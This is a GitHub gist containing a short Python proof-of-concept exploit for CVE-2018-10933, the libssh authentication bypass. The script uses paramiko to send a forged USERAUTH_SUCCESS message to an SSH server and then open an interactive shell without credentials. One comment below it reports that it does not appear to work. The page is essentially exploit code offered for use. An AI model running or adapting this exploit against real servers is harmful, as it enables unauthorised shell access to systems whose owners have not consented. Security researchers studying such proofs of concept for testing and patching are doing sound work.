Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2018-10933 proof-of-concept by Minh Tuan Luong
import paramiko
import socket
import sys
nbytes = 4096
hostname = "127.0.0.1"
port = 2222
sock = socket.socket()
try:
sock.connect((hostname, port))
m = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(m)
cmd_channel = transport.open_session()
cmd_channel.invoke_shell()
except socket.error:
print '[-] Connecting to host failed. Please check the specified host and port.'
sys.exit(1)
@kevinpostal

This comment has been minimized.

Copy link

@kevinpostal kevinpostal commented Oct 17, 2018

Does not appear to work

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment